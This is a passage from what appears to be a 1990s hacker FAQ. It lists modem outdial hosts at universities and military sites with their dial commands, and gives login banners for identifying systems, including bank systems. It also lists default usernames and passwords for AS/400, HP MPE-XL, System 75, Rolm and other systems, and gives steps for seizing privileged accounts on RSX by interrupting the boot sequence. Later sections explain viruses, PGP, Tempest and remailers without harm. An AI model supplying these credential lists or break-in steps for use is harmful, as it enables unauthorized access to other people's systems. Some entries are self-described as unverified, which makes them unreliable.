  1777.                              -------------
  1778.  
  1779.   206          rexair.cac.washington.edu    This is an unbroken password
  1780.   303          yuma.ACNS.ColoState.EDU      login: modem
  1781.   404          128.140.1.239                .modem8|CR
  1782.   415          annex132-1.EECS.Berkeley.EDU "dial1" or "dial2" or "dialer1"
  1783.   514          cartier.CC.UMontreal.CA      externe,9+number
  1784.   703          wal-3000.cns.vt.edu          dial2400 -aa
  1785.  
  1786.  
  1787.                             Dead/No Connect
  1788.                             ---------------
  1789.  
  1790.   201          idsnet
  1791.   202          modem.aidt.edu
  1792.   204          dial.cc.umanitoba.ca
  1793.   204          umnet.cc.manitoba.ca         "dial12" or "dial24"
  1794.   206          dialout24.cac.washington.edu
  1795.   207          modem-o.caps.maine.edu
  1796.   212          B719-7e.NYU.EDU              dial3/dial12/dial24
  1797.   212          B719-7f.NYU.EDU              dial3/dial12/dial24
  1798.   212          DIALOUT-1.NYU.EDU            dial3/dial12/dial24
  1799.   212          FREE-138-229.NYU.EDU         dial3/dial12/dial24
  1800.   212          UP19-4b.NYU.EDU              dial3/dial12/dial24
  1801.   215          wiseowl.ocis.temple.edu      "atz" "atdt 9xxxyyyy"
  1802.   218          aa28.d.umn.edu               "cli" "rlogin modem"
  1803.                                             at "login:"  type "modem"
  1804.   218          modem.d.umn.edu              Hayes 9,XXX-XXXX
  1805.   301          dial9600.umd.edu
  1806.   305          alcat.library.nova.edu
  1807.   305          office.cis.ufl.edu
  1808.   307          modem.uwyo.edu               Hayes  0,XXX-XXXX
  1809.   313          35.1.1.6                     dial2400-aa or dial1200-aa
  1810.                                             or dialout
  1811.   402          dialin.creighton.edu
  1812.   402          modem.criegthon.edu
  1813.   404          broadband.cc.emory.edu       ".modem8" or ".dialout"
  1814.   408          dialout.scu.edu
  1815.   408          dialout1200.scu.edu
  1816.   408          dialout2400.scu.edu
  1817.   408          dialout9600.scu.edu
  1818.   413          dialout.smith.edu
  1819.   414          modems.uwp.edu
  1820.   416          annex132.berkely.edu         atdt 9,,,,, xxx-xxxx
  1821.   416          pacx.utcs.utoronto.ca        modem
  1822.   503          dialout.uvm.edu
  1823.   513          dialout24.afit.af.mil
  1824.   513          r596adi1.uc.edu
  1825.   514          pacx.CC.UMontreal.CA         externe#9 9xxx-xxxx
  1826.   517          engdial.cl.msu.edu
  1827.   602          dial9600.telcom.arizona.edu
  1828.   603          dialout1200.unh.edu
  1829.   604          dial24-nc00.net.ubc.ca
  1830.   604          dial24-nc01.net.ubc.ca
  1831.   604          dial96-np65.net.ubc.ca
  1832.   604          gmodem.capcollege.bc.ca
  1833.   604          hmodem.capcollege.bc.ca
  1834.   609          128.119.131.11X (X= 1 - 4)   Hayes
  1835.   609          129.119.131.11x  (x = 1 to 4)
  1836.   609          wright-modem-1.rutgers.edu
  1837.   609          wright-modem-2.rutgers.edu
  1838.   612          modem_out12e7.atk.com
  1839.   612          modem_out24n8.atk.com
  1840.   614          ns2400.ircc.ohio-state.edu   "dial"
  1841.   615          dca.utk.edu                  dial2400 D 99k #
  1842.   615          MATHSUN23.MATH.UTK.EDU       dial 2400  d  99Kxxxxxxx
  1843.   616          modem.calvin.edu
  1844.   617          128.52.30.3                  2400baud
  1845.   617          dialout.lcs.mit.edu
  1846.   617          dialout1.princeton.edu
  1847.   617          isdn3.Princeton.EDU
  1848.   617          jadwingymkip0.Princeton.EDU
  1849.   617          lord-stanley.Princeton.EDU
  1850.   617          mpanus.Princeton.EDU
  1851.   617          mrmodem.wellesley.edu
  1852.   617          old-dialout.Princeton.EDU
  1853.   617          stagger.Princeton.EDU
  1854.   617          sunshine-02.lcs.mit.edu
  1855.   617          waddle.Princeton.EDU
  1856.   619          128.54.30.1                  atdt [area][phone]
  1857.   619          dialin.ucsd.edu              "dialout"
  1858.   703          modem_pool.runet.edu
  1859.   703          wal-3000.cns.vt.edu
  1860.   713          128.249.27.154               "c modem96"  "atdt 9xxx-xxxx"
  1861.                                             or "Hayes"
  1862.   713          modem12.bcm.tmc.edu
  1863.   713          modem24.bcm.tmc.edu
  1864.   713          modem24.bcm.tmc.edu
  1865.   714          mdmsrv7.sdsu.edu             atdt 8xxx-xxxx
  1866.   714          modem24.nts.uci.edu
  1867.   714          pub-gopher.cwis.uci.edu
  1868.   801          dswitch.byu.edu              "C Modem"
  1869.   808          irmodem.ifa.hawaii.edu
  1870.   902          star.ccs.tuns.ca             "dialout"
  1871.   916          129.137.33.72
  1872.   916          cc-dnet.ucdavis.edu          connect hayes/dialout
  1873.   916          engr-dnet1.engr.ucdavis.edu  UCDNET <ret> C KEYCLUB <ret>
  1874.   ???          128.119.131.11X              (1 - 4)
  1875.   ???          128.200.142.5
  1876.   ???          128.54.30.1                  nue, X to discontinue, ? for Help
  1877.   ???          128.6.1.41
  1878.   ???          128.6.1.42
  1879.   ???          129.137.33.72
  1880.   ???          129.180.1.57
  1881.   ???          140.112.3.2                  ntu            <none>
  1882.   ???          annexdial.rz.uni-duesseldorf.de
  1883.   ???          dial96.ncl.ac.uk
  1884.   ???          dialout.plk.af.mil
  1885.   ???          ee21.ee.ncu.edu.tw           cs8005
  1886.   ???          im.mgt.ncu.edu.tw            guest           <none>
  1887.   ???          modem.cis.uflu.edu
  1888.   ???          modem.ireq.hydro.qc.ca
  1889.   ???          modems.csuohio.edu
  1890.   ???          sparc20.ncu.edu.tw           u349633
  1891.   ???          sun2cc.nccu.edu.tw           ?
  1892.   ???          ts-modem.une.oz.au
  1893.   ???          twncu865.ncu.edu.tw          guest           <none>
  1894.   ???          vtnet1.cns.ut.edu            "CALL" or "call"
  1895.  
  1896.  
  1897. Conclusion
  1898. ----------
  1899. If you find any of the outdials to have gone dead, changed commands,
  1900. or require password, please let us know so we can keep this list as
  1901. accurate as possible. If you would like to add to the list, feel free
  1902. to mail us and it will be included in future versions of this list,
  1903. with your name beside it. Have fun...
  1904.  
  1905. [Editors note: Updates have been made to this document after
  1906.                the original publication]
  1907.  
  1908.  
  1909. 22. What is this system?
  1910.  
  1911.  
  1912. AIX
  1913. ~~~
  1914. IBM AIX Version 3 for RISC System/6000
  1915. (C) Copyrights by IBM and by others 1982, 1990.
  1916. login:
  1917.  
  1918. [You will know an AIX system because it is the only Unix system that]
  1919. [clears the screen and issues a login prompt near the bottom of the]
  1920. [screen]
  1921.  
  1922.  
  1923. AS/400
  1924. ~~~~~~
  1925. UserID?
  1926. Password?
  1927.  
  1928. Once in, type GO MAIN
  1929.  
  1930.  
  1931. CDC Cyber
  1932. ~~~~~~~~~
  1933. WELCOME TO THE NOS SOFTWARE SYSTEM.
  1934. COPYRIGHT CONTROL DATA 1978, 1987.
  1935.  
  1936. 88/02/16. 02.36.53. N265100
  1937. CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
  1938. FAMILY:
  1939.  
  1940. You would normally just hit return at the family prompt.  Next prompt is:
  1941.  
  1942. USER NAME:
  1943.  
  1944.  
  1945. CISCO Router
  1946. ~~~~~~~~~~~~
  1947.                              FIRST BANK OF TNO
  1948.                            95-866 TNO VirtualBank
  1949.                           REMOTE Router -  TN043R1
  1950.  
  1951.                                 Console Port
  1952.  
  1953.                                 SN - 00000866
  1954.  
  1955. TN043R1>
  1956.  
  1957.  
  1958. DECserver
  1959. ~~~~~~~~~
  1960. DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1
  1961. DPS502-DS700
  1962.  
  1963. (c) Copyright 1992, Digital Equipment Corporation - All Rights Reserved
  1964.  
  1965. Please type HELP if you need assistance
  1966.  
  1967. Enter username> TNO
  1968.  
  1969. Local>
  1970.  
  1971.  
  1972. Hewlett Packard MPE-XL
  1973. ~~~~~~~~~~~~~~~~~~~~~~
  1974. MPE XL:
  1975. EXPECTED A :HELLO COMMAND. (CIERR 6057)
  1976. MPE XL:
  1977. EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)
  1978. MPE XL:
  1979.  
  1980.  
  1981. GTN
  1982. ~~~
  1983. WELCOME TO CITIBANK. PLEASE SIGN ON.
  1984. XXXXXXXX
  1985.  
  1986. @
  1987. PASSWORD =
  1988.  
  1989. @
  1990.  
  1991. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1992.  
  1993. PLEASE ENTER YOUR ID:-1->
  1994. PLEASE ENTER YOUR PASSWORD:-2->
  1995.  
  1996. CITICORP (CITY NAME). KEY GHELP FOR HELP.
  1997.   XXX.XXX
  1998.  PLEASE SELECT SERVICE REQUIRED.-3->
  1999.  
  2000.  
  2001. Lantronix Terminal Server
  2002. ~~~~~~~~~~~~~~~~~~~~~~~~~
  2003. Lantronix ETS16 Version V3.1/1(940623)
  2004.  
  2005. Type HELP at the 'Local_15> ' prompt for assistance.
  2006.  
  2007. Login password>
  2008.  
  2009.  
  2010. Meridian Mail (Northern Telecom Phone/Voice Mail System)
  2011. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2012.                             MMM       MM.MERIDIAN
  2013.                            MMMMM     MMMMM
  2014.                          MMMMMM   MMMMMM
  2015.                         MMM  MMMMM  MMM     MMMMM     MMMMM
  2016.                       MMM   MMM   MMM     MMMMMM   MMMMMM
  2017.                      MMM         MMM     MMM MMM MMM MMM
  2018.                     MMM         MMM     MMM  MMMMM  MMM
  2019.                    MMM         MMM     MMM   MMM   MMM
  2020.                   MMM         MMM     MMM         MMM
  2021.                  MMM         MMM     MMM         MMM
  2022.                 MMM         MMM     MMM         MMM
  2023.                MMM         MMM     MMM         MMM
  2024.               MMM         MMM     MMM         MMM
  2025.  
  2026.                                           Copyright (c) Northern Telecom, 1991
  2027.  
  2028.  
  2029. Novell ONLAN
  2030. ~~~~~~~~~~~~
  2031. <Control-A aka smiley face>N
  2032.  
  2033. [To access the systems it is best to own a copy of ONLAN/PC]
  2034.  
  2035.  
  2036. PC-Anywhere
  2037. ~~~~~~~~~~~
  2038. <Control-A aka smiley face>P
  2039.  
  2040. [To access the systems it is best to own a copy of PCAnywhere Remote]
  2041.  
  2042.  
  2043. PRIMOS
  2044. ~~~~~~
  2045. PRIMENET 19.2.7F PPOA1
  2046.  
  2047. <any text>
  2048.  
  2049. ER!
  2050.  
  2051. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  2052.  
  2053. CONNECT
  2054. Primenet V 2.3  (system)
  2055. LOGIN           (you)
  2056. User id?        (system)
  2057. SAPB5           (you)
  2058. Password?       (system)
  2059. DROWSAP         (you)
  2060. OK,             (system)
  2061.  
  2062.  
  2063. ROLM CBX II
  2064. ~~~~~~~~~~~
  2065. ROLM CBXII  RELEASE 9004.2.34 RB295 9000D IBMHO27568
  2066. BIND DATE:  7/APR/93
  2067. COPYRIGHT 1980, 1993 ROLM COMPANY.  ALL RIGHTS RESERVED.
  2068. ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY.
  2069. YOU HAVE ENTERED CPU 1
  2070. 12:38:47 ON WEDNESDAY 2/15/1995
  2071.  
  2072. USERNAME: op
  2073.  
  2074. PASSWORD:
  2075.  
  2076.  INVALID USERNAME-PASSWORD PAIR
  2077.  
  2078.  
  2079. ROLM-OSL
  2080. ~~~~~~~~
  2081. MARAUDER10292  01/09/85(^G) 1 03/10/87  00:29:47
  2082. RELEASE 8003
  2083. OSL, PLEASE.
  2084. ?
  2085.  
  2086.  
  2087. System75
  2088. ~~~~~~~~
  2089. Login: root
  2090. INCORRECT LOGIN
  2091.  
  2092. Login: browse
  2093. Password:
  2094.  
  2095. Software Version: G3s.b16.2.2
  2096.  
  2097. Terminal Type (513, 4410, 4425): [513]
  2098.  
  2099.  
  2100. Tops-10
  2101. ~~~~~~~
  2102. NIH Timesharing
  2103.  
  2104. NIH Tri-SMP 7.02-FF  16:30:04 TTY11
  2105. system 1378/1381/1453 Connected to Node Happy(40) Line # 12
  2106. Please LOGIN
  2107. .
  2108.  
  2109.  
  2110. VM/370
  2111. ~~~~~~
  2112. VM/370
  2113. !
  2114.  
  2115.  
  2116. VM/ESA
  2117. ~~~~~~
  2118. VM/ESA ONLINE
  2119.  
  2120.                                           TBVM2 VM/ESA Rel 1.1     PUT 9200
  2121.  
  2122. Fill in your USERID and PASSWORD and press ENTER
  2123. (Your password will not appear when you type it)
  2124. USERID   ===>
  2125. PASSWORD ===>
  2126.  
  2127. COMMAND  ===>
  2128.  
  2129.  
  2130. Xylogics Annex Communications Server
  2131. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2132. Annex Command Line Interpreter   *   Copyright 1991 Xylogics, Inc.
  2133.  
  2134.  
  2135. Checking authorization, Please wait...      -
  2136. Annex username: TNO                          - Optional security check
  2137. Annex password:                             -  Not always present
  2138.  
  2139. Permission granted
  2140. annex:
  2141.  
  2142.  
  2143. 23. What are the default accounts for XXX?
  2144.  
  2145. AIX
  2146. ~~~
  2147. guest           guest
  2148.  
  2149.  
  2150. AS/400
  2151. ~~~~~~
  2152. qsecofr         qsecofr         /* master security officer */
  2153. qsysopr         qsysopr         /* system operator         */
  2154. qpgmr           qpgmr           /* default programmer      */
  2155.  
  2156. also
  2157.  
  2158. ibm             password
  2159. ibm             2222
  2160. ibm             service
  2161. qsecofr         1111111
  2162. qsecofr         2222222
  2163. qserv           qserv
  2164. qsvr            qsvr
  2165. secofr          secofr
  2166. qsrv            ibmce1
  2167.  
  2168.  
  2169. DECserver
  2170. ~~~~~~~~~
  2171. ACCESS
  2172. SYSTEM
  2173.  
  2174.  
  2175. Dynix (The library software, not the UnixOS)
  2176. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2177. (Type 'later' to exit to the login prompt)
  2178. setup           <no password>
  2179. library         <no password>
  2180. circ            <Social Security Number>
  2181.  
  2182.  
  2183. Hewlett Packard MPE-XL
  2184. ~~~~~~~~~~~~~~~~~~~~~~
  2185. HELLO           MANAGER.SYS
  2186. HELLO           MGR.SYS
  2187. HELLO           FIELD.SUPPORT     HPUNSUP or SUPPORT or HP
  2188. HELLO           OP.OPERATOR
  2189. MGR             CAROLIAN
  2190. MGR             CCC
  2191. MGR             CNAS
  2192. MGR             CONV
  2193. MGR             COGNOS
  2194. OPERATOR        COGNOS
  2195. MANAGER         COGNOS
  2196. OPERATOR        DISC
  2197. MGR             HPDESK
  2198. MGR             HPWORD
  2199. FIELD           HPWORD
  2200. MGR             HPOFFICE
  2201. SPOOLMAN        HPOFFICE
  2202. ADVMAIL         HPOFFICE
  2203. MAIL            HPOFFICE
  2204. WP              HPOFFICE
  2205. MANAGER         HPOFFICE
  2206. MGR             HPONLY
  2207. FIELD           HPP187
  2208. MGR             HPP187
  2209. MGR             HPP189
  2210. MGR             HPP196
  2211. MGR             INTX3
  2212. MGR             ITF3000
  2213. MANAGER         ITF3000
  2214. MAIL            MAIL
  2215. MGR             NETBASE
  2216. MGR             REGO
  2217. MGR             RJE
  2218. MGR             ROBELLE
  2219. MANAGER         SECURITY
  2220. MGR             SECURITY
  2221. FIELD           SERVICE
  2222. MANAGER         SYS
  2223. MGR             SYS
  2224. PCUSER          SYS
  2225. RSBCMON         SYS
  2226. OPERATOR        SYS
  2227. OPERATOR        SYSTEM
  2228. FIELD           SUPPORT
  2229. OPERATOR        SUPPORT
  2230. MANAGER         TCH
  2231. MAIL            TELESUP
  2232. MANAGER         TELESUP
  2233. MGR             TELESUP
  2234. SYS             TELESUP
  2235. MGE             VESOFT
  2236. MGE             VESOFT
  2237. MGR             WORD
  2238. MGR             XLSERVER
  2239.  
  2240. Common jobs are Pub, Sys, Data
  2241. Common passwords are HPOnly, TeleSup, HP, MPE, Manager, MGR, Remote
  2242.  
  2243.  
  2244. Major BBS
  2245. ~~~~~~~~~
  2246. Sysop           Sysop
  2247.  
  2248.  
  2249. Mitel PBX
  2250. ~~~~~~~~~
  2251. SYSTEM
  2252.  
  2253.  
  2254. NeXTSTEP
  2255. ~~~~~~~~
  2256. root            NeXT
  2257. signa           signa
  2258. me              <null>  (Rumored to be correct, not checked)
  2259.  
  2260.  
  2261. Nomadic Computing Environment (NCE) on the Tadpole Technologies SPARCBook3
  2262. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  2263. fax             <no password>
  2264.  
  2265.  
  2266. PICK O/S
  2267. ~~~~~~~~
  2268. DSA             # Desquetop System Administrator
  2269. DS
  2270. DESQUETOP
  2271. PHANTOM
  2272.  
  2273.  
  2274. Prolog
  2275. ~~~~~~
  2276. PBX             PBX
  2277. NETWORK         NETWORK
  2278. NETOP           <null>
  2279.  
  2280.  
  2281. Radio Shack Screen Savers
  2282. ~~~~~~~~~~~~~~~~~~~~~~~~~
  2283. RS<STORE_ID_NUMBER>
  2284.  
  2285.  
  2286. Rolm
  2287. ~~~~
  2288. CBX Defaults
  2289.  
  2290. op              op
  2291. op              operator
  2292. su              super
  2293. admin           pwp
  2294. eng             engineer
  2295.  
  2296.  
  2297. PhoneMail Defaults
  2298.  
  2299. sysadmin        sysadmin
  2300. tech            tech
  2301. poll            tech
  2302.  
  2303.  
  2304. RSX
  2305. ~~~
  2306. SYSTEM/SYSTEM   (Username SYSTEM, Password SYSTEM)
  2307. 1,1/system      (Directory [1,1] Password SYSTEM)
  2308. BATCH/BATCH
  2309. SYSTEM/MANAGER
  2310. USER/USER
  2311.  
  2312. Default accounts for Micro/RSX:
  2313.  
  2314. ..MICRO/RSX
  2315.  
  2316. Alternately you can hit <CTRL-Z>  when the boot sequence asks you for the
  2317. date and create an account using:
  2318.  
  2319. ..RUN ACNT
  2320. .    or  RUN $ACNT
  2321.  
  2322. (Numbers below 10 {oct} are privileged)
  2323.  
  2324. Reboot and wait for the date/time question. Type ^C and at the MCR prompt,
  2325. type "abo at." You must include the . dot!
  2326.  
  2327. If this works, type "acs lb0:/blks=1000" to get some swap space so the
  2328. new step won't wedge.
  2329.  
  2330. type " run $acnt" and change the password of any account with a group
  2331. number of 7 or less.
  2332.  
  2333. You may find that the ^C does not work. Try ^Z and ESC as well.
  2334. Also try all 3 as terminators to valid and invalid times.
  2335.  
  2336. If none of the above work, use the halt switch to halt the system,
  2337. just after a invalid date-time.  Look for a user mode PSW 1[4-7]xxxx.
  2338. then deposit 177777 into R6, cross your fingers, write protect the drive
  2339. and continue the system.  This will hopefully result in indirect blowing
  2340. up...  And hopefully the system has not been fully secured.
  2341.  
  2342.  
  2343. SGI Irix
  2344. ~~~~~~~~
  2345. 4DGifts         <no password>
  2346. guest           <no password>
  2347. demos           <no password>
  2348. lp              <no password>
  2349. nuucp           <no password>
  2350. tour            <no password>
  2351. tutor           <no password>
  2352.  
  2353.  
  2354. System 75
  2355. ~~~~~~~~~
  2356. bcim            bcimpw
  2357. bciim           bciimpw
  2358. bcms            bcmspw, bcms
  2359. bcnas           bcnspw
  2360. blue            bluepw
  2361. browse          looker, browsepw
  2362. craft           crftpw, craftpw, crack
  2363. cust            custpw
  2364. enquiry         enquirypw
  2365. field           support
  2366. inads           indspw, inadspw, inads
  2367. init            initpw
  2368. kraft           kraftpw
  2369. locate          locatepw
  2370. maint           maintpw, rwmaint
  2371. nms             nmspw
  2372. rcust           rcustpw
  2373. support         supportpw
  2374. tech            field
  2375.  
  2376.  
  2377. Taco Bell
  2378. ~~~~~~~~~
  2379. rgm             rollout
  2380. tacobell        <null>
  2381.  
  2382. ..  
  2383. Verifone Junior 2.05
  2384. ~~~~~~~~~~~~~~~~~~~~
  2385. Default password: 166816
  2386.  
  2387.  
  2388. VMS
  2389. ~~~
  2390. field           service
  2391. systest         utep
  2392.  
  2393.  
  2394. XON / XON Junior
  2395. ~~~~~~~~~~~~~~~~
  2396. Default password: 166831
  2397.  
  2398.  
  2399. 24. What port is XXX on?
  2400.  
  2401. The file /etc/services on most Unix machines lists the port
  2402. assignments for that machine.  For a complete list of port
  2403. assignments, read RFC (Request For Comments) 1700 "Assigned Numbers"
  2404.  
  2405.  
  2406. 25.  What is a trojan/worm/virus/logic bomb?
  2407.  
  2408. This FAQ answer was written by Theora:
  2409.  
  2410. Trojan:
  2411.  
  2412. Remember the Trojan Horse?  Bad guys hid inside it until they could
  2413. get into the city to do their evil deed.  A trojan computer program is
  2414. similar.  It is a program which does an unauthorized function, hidden
  2415. inside an authorized program.  It does something other than what it
  2416. claims to do, usually something malicious (although not necessarily!),
  2417. and it is intended by the author to do whatever it does.  If it's not
  2418. intentional, its called a 'bug' or, in some cases, a feature :) Some
  2419. virus scanning programs detect some trojans.  Some virus scanning
  2420. programs don't detect any trojans.  No virus scanners detect all
  2421. trojans.
  2422.  
  2423. Virus:
  2424.  
  2425. A virus is an independent program which reproduces itself.  It may
  2426. attach to other programs, it may create copies of itself (as in
  2427. companion viruses).  It may damage or corrupt data, change data, or
  2428. degrade the performance of your system by utilizing resources such as
  2429. memory or disk space.  Some virus scanners detect some viruses.  No
  2430. virus scanners detect all viruses.  No virus scanner can protect
  2431. against "any and all viruses, known and unknown, now and forevermore".
  2432.  
  2433. Worm:
  2434.  
  2435. Made famous by Robert Morris, Jr. , worms are programs which reproduce
  2436. by copying themselves over and over, system to system, using up
  2437. resources and sometimes slowing down the systems.  They are self
  2438. contained and use the networks to spread, in much the same way viruses
  2439. use files to spread.  Some people say the solution to viruses and
  2440. worms is to just not have any files or networks.  They are probably
  2441. correct.  We would include computers.
  2442.  
  2443. Logic Bomb:
  2444.  
  2445. Code which will trigger a particular form of 'attack' when a
  2446. designated condition is met.  For instance, a logic bomb could delete
  2447. all files on Dec.  5th.  Unlike a virus, a logic bomb does not make
  2448. copies of itself.
  2449.  
  2450.  
  2451. 26.  How can I protect myself from viruses and such?
  2452.  
  2453. This FAQ answer was written by Theora:
  2454.  
  2455. The most common viruses are boot sector infectors.  You can help protect
  2456. yourself against those by write protecting all disks which you do not
  2457. need write access to.  Definitely keep a set of write protected floppy
  2458. system disks.  If you get a virus, it will make things much simpler.
  2459. And, they are good for coasters.  Only kidding.
  2460.  
  2461. Scan all incoming files with a recent copy of a good virus scanner.
  2462. Among the best are F-Prot, Dr.  Solomon's Anti-virus Toolkit, and
  2463. Thunderbyte Anti-Virus.  AVP is also a good program.  Using more than
  2464. one scanner could be helpful.  You may get those one or two viruses that
  2465. the other guy happened to miss this month.
  2466.  
  2467. New viruses come out at the rate of about 8 per day now.  NO scanner can
  2468. keep up with them all, but the four mentioned here do the best job of
  2469. keeping current.  Any _good_ scanner will detect the majority of common
  2470. viruses.  No virus scanner will detect all viruses.
  2471.  
  2472. Right now there are about 5600 known viruses.  New ones are written all
  2473. the time.  If you use a scanner for virus detection, you need to make
  2474. sure you get frequent updates.  If you rely on behavior blockers, you
  2475. should know that such programs can be bypassed easily by a technique
  2476. known as tunnelling.
  2477.  
  2478. You may want to use integrity checkers as well as scanners.  Keep in
  2479. mind that while these can supply added protection, they are not
  2480. foolproof.
  2481.  
  2482. You may want to use a particular kind of scanner, called resident
  2483. scanners.  Those are programs which stay resident in the computer memory
  2484. and constantly monitor program execution (and sometimes even access to
  2485. the files containing programs).  If you try to execute a program, the
  2486. resident scanner receives control and scans it first for known viruses.
  2487. Only if no such viruses are found, the program is allowed to execute.
  2488.  
  2489. Most virus scanners will not protect you against many kinds of trojans,
  2490. any sort of logic bombs, or worms.  Theoretically, they _could_ protect
  2491. you against logic bombs and/or worms, by addition of scanning strings;
  2492. however, this is rarely done.
  2493.  
  2494. The best, actually only way, to protect yourself is to know what you
  2495. have on your system and make sure what you have there is authorized by
  2496. you.  Make frequent backups of all important files.  Keep your DOS
  2497. system files write protected.  Write protect all disks that you do not
  2498. need to write to.  If you do get a virus, don't panic.  Call the support
  2499. department of the company who supplies your anti-virus product if you
  2500. aren't sure of what you are doing.  If the company you got your
  2501. anti-virus software from does not have a good technical support
  2502. department, change companies.
  2503.  
  2504. The best way to make sure viruses are not spread is not to spread them.
  2505. Some people do this intentionally.  We discourage this. Viruses aren't
  2506. cool.
  2507.  
  2508.  
  2509. 27.  Where can I get more information about viruses?
  2510.  
  2511. This FAQ answer was written by Theora:
  2512.  
  2513. Assembly language programming books illustrate the (boring) aspect of
  2514. replication and have for a long time.  The most exciting/interesting
  2515. thing about viruses is all the controversy around them.  Free speech,
  2516. legality, and cute payloads are a lot more interesting than "find first,
  2517. find next" calls.  You can get information about the technical aspects
  2518. of viruses, as well as help if you should happen to get a virus, from
  2519. the virus-l FAQ, posted on comp. virus every so often. You can also pick
  2520. up on the various debates there.  There are alt.virus type newsgroups,
  2521. but the level of technical expertise is minimal, and so far at least
  2522. there has not been a lot of real "help" for people who want to get -rid-
  2523. of a virus.
  2524.  
  2525. There are a lot of virus experts.  To become one, just call yourself
  2526. one.  Only Kidding.  Understanding viruses involves understanding
  2527. programming, operating systems, and their interaction.  Understanding
  2528. all of the 'Cult of Virus' business requires a lot of discernment. There
  2529. are a number of good papers available on viruses, and the Cult of Virus;
  2530. you can get information on them from just about anyone listed in the
  2531. virus-l FAQ.  The FTP site ftp.informatik.uni-hamburg.de is a pretty
  2532. reliable site for programs and text.
  2533.  
  2534.  
  2535. 28. What is Cryptoxxxxxxx?
  2536.  
  2537. This FAQ answer is excerpted from: Computer Security Basics
  2538.                                    by Deborah Russell
  2539.                                    and G.T. Gengemi Sr.
  2540.  
  2541. A message is called either plaintext or cleartext.  The process of
  2542. disguising a message in such a way as to hide its substance is called
  2543. encryption.  An encrypted message is called ciphertext.  The process
  2544. of turning ciphertext back into plaintext is called decryption.
  2545.  
  2546. The art and science of keeping messages secure is called cryptography,
  2547. and it is practiced by cryptographers.  Cryptanalysts are
  2548. practitioners of cryptanalysis, the art and science of breaking
  2549. ciphertext, i.e. seeing through the disguise.  The branch of
  2550. mathematics embodying both cryptography and cryptanalysis is called
  2551. cryptology, and it's practitioners are called cryptologists.
  2552.  
  2553.  
  2554. 29. What is PGP?
  2555.  
  2556. This FAQ answer is excerpted from: PGP(tm) User's Guide
  2557.                                    Volume I: Essential Topics
  2558.                                    by Philip Zimmermann
  2559.  
  2560. PGP(tm) uses public-key encryption to protect E-mail and data files.
  2561. Communicate securely with people you've never met, with no secure
  2562. channels needed for prior exchange of keys.  PGP is well featured and
  2563. fast, with sophisticated key management, digital signatures, data
  2564. compression, and good ergonomic design.
  2565.  
  2566. Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a
  2567. high security cryptographic software application for MS-DOS, Unix,
  2568. VAX/VMS, and other computers.  PGP allows people to exchange files or
  2569. messages with privacy, authentication, and convenience.  Privacy means
  2570. that only those intended to receive a message can read it.
  2571. Authentication means that messages that appear to be from a particular
  2572. person can only have originated from that person. Convenience means
  2573. that privacy and authentication are provided without the hassles of
  2574. managing keys associated with conventional cryptographic software.  No
  2575. secure channels are needed to exchange keys between users, which makes
  2576. PGP much easier to use.  This is because PGP is based on a powerful
  2577. new technology called "public key" cryptography.
  2578.  
  2579. PGP combines the convenience of the Rivest-Shamir-Adleman (RSA)
  2580. public key cryptosystem with the speed of conventional cryptography,
  2581. message digests for digital signatures, data compression before
  2582. encryption, good ergonomic design, and sophisticated key management. 
  2583. And PGP performs the public-key functions faster than most other
  2584. software implementations.  PGP is public key cryptography for the
  2585. masses.
  2586.  
  2587.  
  2588. 30. What is Tempest?
  2589.  
  2590. Tempest stands for Transient Electromagnetic Pulse Surveillance
  2591. Technology.
  2592.  
  2593. Computers and other electronic equipment release interference to their
  2594. surrounding environment.  You may observe this by placing two video
  2595. monitors close together.  The pictures will behave erratically until you
  2596. space them apart.
  2597.  
  2598. What is important for an observer is the emission of digital pulses (1s
  2599. and 0s) as these are used in computers.  The channel for this radiation
  2600. is in two arrangements, radiated emissions and conducted emissions.
  2601. Radiated emissions are assembled when components in electrical devices
  2602. form to act as antennas.  Conducted emissions are formed when radiation
  2603. is conducted along cables and wires.
  2604.  
  2605. Although most of the time these emissions are simply annoyances, they
  2606. can sometimes be very helpful.  Suppose we wanted to see what project a
  2607. target was working on.  We could sit in a van outside her office and use
  2608. sensitive electronic equipment to attempt to pick up and decipher the
  2609. radiated emissions from her video monitor.  These emissions normally
  2610. exist at around 55-245 Mhz and can be picked up as far as one kilometer
  2611. away.
  2612.  
  2613. A monitoring device can distinguish between different sources emitting
  2614. radiation because the sources emanating the radiation are made up of
  2615. dissimilar elements and so this coupled with other factors varies the
  2616. emitted frequency.  For example different electronic components in VDUs,
  2617. different manufacturing processes involved in reproducing the VDUs,
  2618. different line syncs, etc...  By synchronizing our raster with the
  2619. targets raster we can passively draw the observed screen in real-time.
  2620. This technology can be acquired by anyone, not just government agencies.
  2621.  
  2622. The target could shield the emissions from her equipment or use
  2623. equipment that does not generate strong emissions.  However, Tempest
  2624. equipment is not legal for civilian use in the United States.
  2625.  
  2626. Tempest is the US Government program for evaluation and endorsement of
  2627. electronic equipment that is safe from eavesdropping.  Tempest
  2628. certification refers to the equipment having passed a testing phase and
  2629. agreeing to emanations rules specified in the government document NACSIM
  2630. 5100A (Classified).  This document sets forth the emanation levels that
  2631. the US Government believes equipment can give off without compromising
  2632. the information it is processing.
  2633.  
  2634.  
  2635. 31. What is an anonymous remailer?
  2636.  
  2637. This FAQ answer was written by Raph Levien:
  2638.  
  2639. An anonymous remailer is a system on the Internet that allows you to
  2640. send e-mail or post messages to Usenet anonymously.
  2641.  
  2642. There are two sorts of remailers in widespread use.  The first is the
  2643. anon.penet.fi style, the second is the cypherpunk style.  The remailer
  2644. at anon.penet.fi is immensely popular, with over 160,000 users over its
  2645. lifetime, and probably tens of thousands of messages per day.  Its main
  2646. advantage is that it's so easy to use.  The cypherpunks mailers, which
  2647. provide much better security, are becoming more popular, however, as
  2648. there is more awareness of them.
  2649.  
